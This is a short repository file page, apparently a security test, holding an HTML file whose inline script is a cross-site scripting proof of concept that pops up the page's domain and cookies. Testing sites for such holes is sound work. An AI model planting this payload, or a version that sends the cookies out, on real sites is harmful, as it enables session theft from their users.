test-ssrf-2 / xss.html
osamaeid's picture
test HTML XSS
43b59fc verified
raw
history blame contribute delete
102 Bytes
<html><body><script>alert(document.domain+"|"+document.cookie)</script><h1>XSS Test</h1></body></html>